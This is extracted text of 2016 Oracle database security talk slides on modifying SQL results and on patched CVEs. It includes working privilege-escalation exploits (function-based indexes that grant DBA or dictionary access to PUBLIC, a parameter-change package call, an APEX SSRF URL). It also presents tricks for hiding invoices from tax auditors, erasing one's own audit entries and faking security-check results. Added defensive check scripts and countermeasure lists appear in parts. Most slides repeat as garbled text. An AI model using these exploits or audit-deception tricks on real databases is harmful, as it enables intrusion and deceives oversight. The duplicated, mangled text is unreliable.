last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wishes…
but luckily we are using Oracle.

Problem & Solution
Oracle offers different features to fulfill these wishes without affecting other users…
All these scenarios have in common that we have to manipulate SQL statements.

Select value …
Oracle Data Redaction allows you to mask or manipulate the selected data for just a single database user.
Possible usage: replace TRUE/FALSE, replace USER/ADMIN, …
The DBA can decide what will be returned.

Select value …
A typical query from security checklists or scanners looks like this:
select upper(value) from parameter where upper(name) = 'XYZ'
The tool expects the value TRUE, but the column contains FALSE.
Oracle Data Redaction allows you to change the result value from FALSE to TRUE.
==> The audit department is happy because the database passes all the security checks…

… from table/view …
Modifying objects can be used as a man in the middle as well.
Possible approaches:
- modify views (e.g. add a condition such as spare1 <> 'DBA1' to the view dba_audit_trail). All entries of the OS user DBA1 will be removed from the view. If a SIEM solution retrieves the audit data through the view, nothing from DBA1 is retrieved.
- create or change synonyms to "redirect" objects
- replace a table with a view plus an INSTEAD OF trigger

----- dbms_macadm -----
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) >= 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;

SQL> create or replace view mydual as select 'X' as dummy from dual where user = 'DVSYS';
SQL> grant select on sys.mydual to public;
SQL> drop public synonym dual;
SQL> create public synonym dual for sys.mydual;
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL

Red Attack - Die Katastrophe in der Datenbank ("The catastrophe in the database", Gunther Pipperr)

… where x=y
WHERE conditions can be changed using VPD.
VPD: add the where clause invoice_name != 'SAUNA_CLUB CHANTAL'
Hide "certain" invoices from the audit department.

Select value from table/view where x=y
The SQL Translation Framework (12c only) allows you to replace an entire query:
the user submits Query A, and the SQL Translation Framework replaces Query A with Query B.
Possible Countermeasures for paranoid Auditors
- Add a random string, e.g. aksdjhiuz, to your statements to avoid the SQL Translation Framework (new SQL_ID, so a stored translation no longer matches)
- Try to get EXEMPT ACCESS POLICY to disable VPD (even if VPD is not used in the application)
- Use fully qualified names instead of synonyms (e.g. SYS.DUAL instead of DUAL)
- Always check the object type (is it really a table?)
- Use checksums for certain database objects (especially views)
- Check the current schema to avoid attacks (e.g. alter session set current_schema=otheruser)
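The countermeasures above can be turned into a routine check. The following script is an added example, not part of the original talk; it assumes SELECT ANY DICTIONARY plus EXECUTE on DBMS_CRYPTO on a 12c database, and uses SYS.DBA_AUDIT_TRAIL as a placeholder for whichever view the SIEM reads.

```sql
-- Added example (not from the DOAG talk): auditor self-checks against
-- on-the-fly query modification. Assumes SELECT ANY DICTIONARY and EXECUTE
-- on DBMS_CRYPTO on an Oracle 12c database.
SET SERVEROUTPUT ON SIZE UNLIMITED
SET LINESIZE 200

-- 1. Which schema are unqualified names resolved in right now?
--    SESSION_USER and CURRENT_SCHEMA must be identical for the audit session.
SELECT SYS_CONTEXT('USERENV', 'SESSION_USER')   AS session_user,
       SYS_CONTEXT('USERENV', 'CURRENT_SCHEMA') AS current_schema
  FROM sys.dual;

-- 2. Does DUAL still resolve to the SYS table? Expect exactly one row:
--    a PUBLIC synonym pointing at SYS.DUAL with object_type TABLE.
SELECT s.owner AS syn_owner, s.synonym_name, s.table_owner, s.table_name, o.object_type
  FROM dba_synonyms s
  JOIN dba_objects  o ON o.owner = s.table_owner AND o.object_name = s.table_name
 WHERE s.synonym_name = 'DUAL';

-- 3. Is it really a table? Anything other than the table (or its synonym)
--    hiding behind a dictionary table name.
SELECT owner, object_name, object_type
  FROM dba_objects
 WHERE object_name IN ('DUAL', 'AUD$', 'USER$')
   AND object_type NOT IN ('TABLE', 'SYNONYM');

-- 4. Data Redaction: every policy, and everyone who may bypass redaction.
SELECT object_owner, object_name, policy_name, expression, enable
  FROM redaction_policies
 ORDER BY object_owner, object_name;
SELECT grantee FROM dba_sys_privs WHERE privilege = 'EXEMPT REDACTION POLICY';

-- 5. VPD: enabled policies (also on objects the application never uses),
--    and who holds EXEMPT ACCESS POLICY (the audit account should).
SELECT object_owner, object_name, policy_name, pf_owner, package, function
  FROM dba_policies
 WHERE enable = 'YES'
 ORDER BY object_owner, object_name;
SELECT grantee FROM dba_sys_privs WHERE privilege = 'EXEMPT ACCESS POLICY';

-- 6. SQL Translation Framework (12c): any profile or stored translation at all.
SELECT owner, profile_name FROM dba_sql_translation_profiles;
SELECT owner, profile_name, sql_text, translated_text FROM dba_sql_translations;

-- 7. Checksum of a view definition; compare with the value recorded at baseline.
--    SYS.DBA_AUDIT_TRAIL stands in for whichever view the SIEM reads.
DECLARE
  l_ddl  CLOB;
  l_hash RAW(32);
BEGIN
  l_ddl  := DBMS_METADATA.GET_DDL('VIEW', 'DBA_AUDIT_TRAIL', 'SYS');
  l_hash := DBMS_CRYPTO.HASH(l_ddl, DBMS_CRYPTO.HASH_SH256);
  DBMS_OUTPUT.PUT_LINE('SYS.DBA_AUDIT_TRAIL SHA-256: ' || RAWTOHEX(l_hash));
END;
/
```

Run it from a session that connects with fully qualified names and compare the hash in step 7 against a baseline taken on a known-clean system.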
Modifying Queries on the fly
Powerful features for applications
(Huge) potential on critical systems to modify application logic (e.g. DB Vault)
DBAs and auditors/security departments should be aware of powerful Oracle features which could be used to modify application logic.
Audit these features even if they are not in use.

Trends 2017
- New hardening documents for Oracle 12.2 required (new features, new packages, …)
- Migration to 12.2
- More auditing projects
- Integration of auditing with SIEM solutions

Q & A
Thank you / Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jul 2016 CPU - CVE-2016-3467
http://www.davidlitchfield.com/OracleCPUApril2016.pdf
Problem: Apex 5 is vulnerable to a server side request forgery flaw, i.e. it can be made to connect to another web server and port regardless of whether allowed URLs have been configured. For example, the request below will connect to someotherserver on the given port and POST X as a payload. This can be used as a port scanning mechanism, used to attack systems protected by a firewall, etc.
Reporter: David Litchfield
Exploit:
http://example/ords/apex_050000.WWV_FLOW_WEBSERVICES_API.MAKE_REQUEST?P_URL=http://someotherserver:port&p_envelope=X
Apr 2016 CPU - CVE-2016-3488
Problem: Package dbms_gsm_common allows changing database parameters without the admin privileges and without a restart.
Reporter: Bruno Cirone
Exploit:
exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')

Jul 2016 CPU - CVE-2016-3488
-- as SYS
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  FALSE

-- as user GSMUSER
SQL> exec gsmadmin_internal.dbms_gsm_common.setdbparameter('O7_DICTIONARY_ACCESSIBILITY', 'TRUE')
PL/SQL-Prozedur erfolgreich abgeschlossen.

-- as user SYS - re-run the query after execution of the package
SQL> select name, value from v$parameter where name = 'O7_DICTIONARY_ACCESSIBILITY';
O7_DICTIONARY_ACCESSIBILITY  TRUE
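A parameter changed through a package rather than through ALTER SYSTEM still leaves traces in the instance. The following script is an added example, not part of the original talk; it assumes SELECT ANY DICTIONARY and a single-instance database started from an spfile.

```sql
-- Added example (not from the talk): who can reach the package behind
-- CVE-2016-3488, and which parameters no longer match the spfile.
-- Assumes SELECT ANY DICTIONARY, a single-instance database and an spfile.

-- 1. Grantees of the package. Anything beyond the GSM administration accounts
--    and roles shipped by Oracle needs an explanation.
SELECT grantee, privilege, grantable
  FROM dba_tab_privs
 WHERE owner = 'GSMADMIN_INTERNAL'
   AND table_name = 'DBMS_GSM_COMMON';

-- 2. Parameters changed since instance startup. ISMODIFIED is SYSTEM_MOD after
--    ALTER SYSTEM and MODIFIED after ALTER SESSION. A static parameter
--    (ISSYS_MODIFIABLE = FALSE) listed here had its in-memory value changed
--    without the restart such a change normally requires.
SELECT name, value, ismodified, issys_modifiable
  FROM v$parameter
 WHERE ismodified <> 'FALSE'
 ORDER BY issys_modifiable, name;

-- 3. In-memory value versus spfile value, for single-valued parameters only
--    (list parameters occupy several rows in V$SPPARAMETER and are skipped).
SELECT p.name, p.display_value AS memory_value, sp.display_value AS spfile_value
  FROM v$parameter p
  JOIN (SELECT name, MAX(display_value) AS display_value
          FROM v$spparameter
         WHERE isspecified = 'TRUE'
         GROUP BY name
        HAVING COUNT(*) = 1) sp ON sp.name = p.name
 WHERE NVL(UPPER(sp.display_value), '~') <> NVL(UPPER(p.display_value), '~')
 ORDER BY p.name;

-- 4. The parameter changed in the example above, with its modification flags.
SELECT name, value, isdefault, ismodified, issys_modifiable
  FROM v$parameter
 WHERE UPPER(name) = 'O7_DICTIONARY_ACCESSIBILITY';
```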
July 2016 CPU - CVE-2016-3484
Problem: SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter: Alexander Kornbrust
Problem (Details + Exploit later…)

FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS
  TMP  VARCHAR2(32767);
  TMP2 VARCHAR2(32767);
BEGIN
  SELECT DVSYS.DV_SQL_TEXT INTO TMP FROM DUAL;
  IF LENGTH(TMP) >= 4000 THEN
    RETURN 'N';
  END IF;
  TMP2 := UPPER(TMP);
  IF (TMP2) LIKE '%RECYCLEBIN%' AND (TMP2) LIKE '%ON%' THEN
    RETURN 'N';
  END IF;
  RETURN 'Y';
END;
July 2016 CPU - CVE-2016-3489
Problem: Privilege escalation via INDEX privilege and function based index (FBI)
Reporter: Alexander Kornbrust

July 2016 CPU - CVE-2016-3489
-- Oracle 11.2.0.4, connected as SYSTEM
SQL> select grantee, owner, table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = 'INDEX' AND GRANTEE != OWNER and owner = 'SYS';

GRANTEE    OWNER    TABLE_NAME
---------- -------- ----------
SYSTEM     SYS      INCEXP
SYSTEM     SYS      INCFIL
SYSTEM     SYS      INCVID

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant select on sys.link$ to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
SQL> grant execute on getdba to public;

July 2016 CPU - CVE-2016-3489
==> SYSTEM does not have access to the SYS.LINK$ table
SQL> select count(*) from sys.link$;
ERROR at line 1:
ORA-01031: insufficient privileges

==> also the execution of getdba throws an error
SQL> select getdba('i') from dual;
ERROR at line 1:
ORA-01031: insufficient privileges
ORA-06512: at "SYSTEM.GETDBA", line 4

==> Now create an index on the table sys.incvid using a function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('AK'));
Index created.

SQL> select count(*) from sys.link$;
  COUNT(*)
----------
        11

July 2016 CPU - CVE-2016-3489
-- Oracle 12.1.0.2 (SYSTEM no longer has INHERIT ANY PRIVILEGE)
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'));
CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(SYSTEM.GETDBA('1'))
FEHLER in Zeile 1:
ORA-06598: Nicht ausreichende INHERIT PRIVILEGES-Berechtigung
ORA-06512: in "SYSTEM.GETDBA", Zeile 1

-- On 12.1.0.2 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use
-- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsys.GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
  execute immediate 'grant select on sys.link$ to public';
  COMMIT;
  RETURN FOO;
END;
/
SQL> grant execute on wmsys.getdba to public;
-- now we create the index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYS.INCVID(WMSYS.GETDBA('AK'));
August 2016
Hackproofing Oracle's eBusiness Suite by David Litchfield
Presentation + Supporting documents:
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4.pdf
https://www.blackhat.com/docs/us-16/materials/us-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5.pdf

September 2016
Nothing special happened
October 2016
Oracle CPU October 2016
http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html

October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 9.1)
2 Kernel PDB (CVSS 6.4, 6.0)
3 RDBMS Security (CVSS 6.4, 3.3, 3.3)
1 APEX (CVSS 6.1, remote)
1 RDBMS Security & SQL*Plus (CVSS 2.4)

Oct 2016 CPU - CVE-2016-5497
Problem: UNSALTED MD5 HASH STILL PRESENT IN 12C DATABASE - DIGEST VERIFIER
Shown as an open problem in the DOAG 2015 presentation
Reporter: Alexander Kornbrust
Oracle Password Hash 12.1.0.2+
Oracle 12.1.0.2 introduced a new PBKDF2 SHA-512 based algorithm.
The new T: password hash is 10 times slower than the old DES hash (Oracle 7+) and 88 times slower than the SHA1-based hash (Oracle 11+).
The new algorithm is known and already implemented in some tools.
Remark: Microsoft Office 2013 is 10 times more time consuming to crack than the new Oracle PBKDF2.

Oracle Password Hash 12.1.0.2+
Let's have a look at RFC 2617:
KD(secret, data) = H(concat(secret, ":", data))
No salt, but a secret.
Secret = 'XDB'
and the hash will be MD5('XDB:tiger')
and is stored in the spare4 column as the entry starting with "H:" (the H: hash).
Oct 2016 CPU - CVE-2016-5516
Problem: In Oracle 12c the DBMS_PDB_EXEC_SQL procedure is a wrapper for the DBMS_PDB.EXEC_AS_ORACLE_SCRIPT procedure, which executes SQL as the SYS user. The XDB user has the execute privilege on DBMS_PDB_EXEC_SQL, and as such, by first exploiting a vulnerability in a publicly executable XDB-owned PL/SQL object, an attacker can leverage this privilege to execute SQL as SYS. The fix changes both DBMS_PDB_EXEC_SQL and DBMS_PDB from using the DEFINER rights to the INVOKER rights execution model.
Reporter: David Litchfield
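Two checks that follow from CVE-2016-5497 and CVE-2016-5516, added here as an example and not part of the original talk: which verifier types each account still carries in spare4 (the S:, H: and T: prefixes described above), and whether the DBMS_PDB wrappers now run with invoker rights. Assumes SYSDBA (for SYS.USER$) on 12.1.0.2 or later.

```sql
-- Added example (not from the talk): post-October-2016-CPU checks for
-- CVE-2016-5497 (digest verifier) and CVE-2016-5516 (DBMS_PDB_EXEC_SQL).
-- Assumes SYSDBA on Oracle 12.1.0.2 or later.

-- 1. Verifier types per open user account. SPARE4 holds ';'-separated entries:
--    S: SHA-1 based (11g), H: MD5 digest (RFC 2617, unsalted), T: PBKDF2-SHA512 (12.1.0.2+).
--    The legacy DES verifier, when present, lives in the PASSWORD column.
SELECT u.name,
       CASE WHEN u.password IS NOT NULL            THEN 'Y' ELSE 'N' END AS des_10g,
       CASE WHEN REGEXP_LIKE(u.spare4, '(^|;)S:') THEN 'Y' ELSE 'N' END AS sha1_11g,
       CASE WHEN REGEXP_LIKE(u.spare4, '(^|;)H:') THEN 'Y' ELSE 'N' END AS md5_digest,
       CASE WHEN REGEXP_LIKE(u.spare4, '(^|;)T:') THEN 'Y' ELSE 'N' END AS pbkdf2_12c
  FROM sys.user$ u
 WHERE u.type#   = 1        -- users, not roles
   AND u.astatus = 0        -- OPEN accounts only
 ORDER BY u.name;

-- 2. How many open accounts still carry the unsalted MD5 verifier at all.
SELECT COUNT(*) AS open_accounts_with_md5_digest
  FROM sys.user$
 WHERE type# = 1 AND astatus = 0
   AND REGEXP_LIKE(spare4, '(^|;)H:');

-- 3. CVE-2016-5516: after the fix both objects must report AUTHID = CURRENT_USER.
SELECT owner, object_name, object_type, authid
  FROM dba_procedures
 WHERE owner = 'SYS'
   AND object_name IN ('DBMS_PDB_EXEC_SQL', 'DBMS_PDB')
   AND procedure_name IS NULL;

-- 4. Who holds EXECUTE on them (the talk states XDB had it before the fix).
SELECT grantee, table_name, privilege
  FROM dba_tab_privs
 WHERE owner = 'SYS'
   AND table_name IN ('DBMS_PDB_EXEC_SQL', 'DBMS_PDB')
 ORDER BY table_name, grantee;
```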
Oct 2016 CPU - CVE-2016-5604
Problem: Privilege Escalation in Oracle Cloud Control (12.1.3)
Reporter: Alexander Kornbrust

$ sqlplus sysman_apm/rds@ora1
SQL> desc dba_users
ERROR:
ORA-04043: object SYS.DBA_USERS does not exist

==> the user does not have the privilege to access DBA_USERS
SQL> select * from user_sys_privs;

USERNAME     PRIVILEGE              ADM
------------ ---------------------- ---
SYSMAN_APM   UNLIMITED TABLESPACE   NO
SYSMAN_APM   CREATE VIEW            NO
SYSMAN_APM   CREATE ANY LIBRARY     NO
SYSMAN_APM   CREATE SEQUENCE        NO
SYSMAN_APM   CREATE TABLE           NO
SYSMAN_APM   CREATE LIBRARY         NO
SYSMAN_APM   CREATE ANY INDEX       NO

==> the CREATE ANY LIBRARY privilege is granted to SYSMAN_APM
SQL> select * from user_role_privs;

USERNAME     GRANTED_ROLE   ADM DEF OS_
------------ -------------- --- --- ---
SYSMAN_APM   CONNECT        NO  YES NO
SYSMAN_APM   RESOURCE       NO  YES NO

==> Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER
SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS
  2    PRAGMA AUTONOMOUS_TRANSACTION;
  3  BEGIN
  4    execute immediate 'grant dba to public';
  5    COMMIT;
  6    RETURN FOO;
  7  END;
  8  /
==> Grant execution privileges to PUBLIC
SQL> grant execute on getdba to public;

==> Create an index on SYSTEM.HELP using a function based index (FBI); the function getdba is used for the function based index
SQL> CREATE INDEX EXPLOIT_INDEX ON SYSTEM.HELP(SYSMAN_APM.GETDBA('AK2'));

==> A reconnect is necessary
SQL> select * from dba_role_privs where granted_role = 'DBA' and grantee = 'PUBLIC';

GRANTEE    GRANTED_ROLE   ADM DEF
---------- -------------- --- ---
PUBLIC     DBA            NO  YES
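The same function-based-index technique appears in CVE-2016-3489 above and in the Cloud Control case CVE-2016-5604 just shown. The following script is an added example, not part of the original talk, that audits the preconditions from the defender's side; it assumes SELECT ANY DICTIONARY on Oracle 11.2 or 12.1.

```sql
-- Added example (not from the talk): audit the preconditions of the
-- function-based index (FBI) privilege escalation shown for CVE-2016-3489
-- and CVE-2016-5604. Assumes SELECT ANY DICTIONARY on Oracle 11.2 or 12.1.
SET SERVEROUTPUT ON SIZE UNLIMITED

-- 1. Object-level INDEX privilege on tables of another schema (the 11.2.0.4 pattern).
SELECT grantee, owner, table_name
  FROM dba_tab_privs
 WHERE privilege = 'INDEX'
   AND grantee <> owner
 ORDER BY grantee, owner, table_name;

-- 2. System privileges that let a user index, or create code in, a foreign schema.
SELECT grantee, privilege
  FROM dba_sys_privs
 WHERE privilege IN ('CREATE ANY INDEX', 'CREATE ANY PROCEDURE', 'INHERIT ANY PRIVILEGES')
   AND grantee NOT IN ('SYS', 'DBA')
 ORDER BY privilege, grantee;

-- 3. Function-based indexes whose expression calls a schema-qualified function
--    owned by someone other than the table owner. COLUMN_EXPRESSION is a LONG,
--    so it is read into a VARCHAR2 and scanned in PL/SQL.
DECLARE
  -- matches OWNER.FUNC( or "OWNER"."FUNC"( ; subexpressions 1 and 2 capture the names
  c_pat   CONSTANT VARCHAR2(100) := '"?([A-Z0-9_$#]+)"?\."?([A-Z0-9_$#]+)"?\s*\(';
  l_expr  VARCHAR2(32767);
  l_owner VARCHAR2(128);
  l_func  VARCHAR2(128);
  l_occ   PLS_INTEGER;
  l_is_fn PLS_INTEGER;
BEGIN
  FOR r IN (SELECT index_owner, index_name, table_owner, table_name, column_expression
              FROM dba_ind_expressions)
  LOOP
    l_expr := r.column_expression;   -- LONG to VARCHAR2 is allowed in PL/SQL
    l_occ  := 1;
    LOOP
      l_owner := UPPER(REGEXP_SUBSTR(l_expr, c_pat, 1, l_occ, 'i', 1));
      EXIT WHEN l_owner IS NULL;
      l_func := UPPER(REGEXP_SUBSTR(l_expr, c_pat, 1, l_occ, 'i', 2));
      IF l_owner <> r.table_owner THEN
        -- confirm it is a standalone function (PKG.FUNC calls do not match an owner and are skipped)
        SELECT COUNT(*) INTO l_is_fn
          FROM dba_objects
         WHERE owner = l_owner AND object_name = l_func AND object_type = 'FUNCTION';
        IF l_is_fn > 0 THEN
          DBMS_OUTPUT.PUT_LINE('FBI ' || r.index_owner || '.' || r.index_name ||
                               ' on ' || r.table_owner || '.' || r.table_name ||
                               ' calls ' || l_owner || '.' || l_func ||
                               ' -> review: evaluated when the index is built or the table changes');
        END IF;
      END IF;
      l_occ := l_occ + 1;
    END LOOP;
  END LOOP;
END;
/
```

Step 3 would list the EXPLOIT_INDEX objects from the two transcripts above, because their expressions call SYSTEM.GETDBA, WMSYS.GETDBA or SYSMAN_APM.GETDBA on tables owned by SYS or SYSTEM.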
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic

Scenario 1
A top manager comes to the office of the DBA and asks you: "Tomorrow the auditor from the tax authority will come to check our invoices. Could you hide the 10,000 EUR invoice from the last party at the night club, just from the auditor? I will increase your salary…"

Scenario 2
Remove your own audit entries from the audit log which is retrieved by the SIEM solution (e.g. Splunk, QRadar, …) via JDBC.

Scenario 3
You don't have time to harden all your databases, but the security department wants to see results. Instead of fixing the problem you will just deliver the proper results.
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
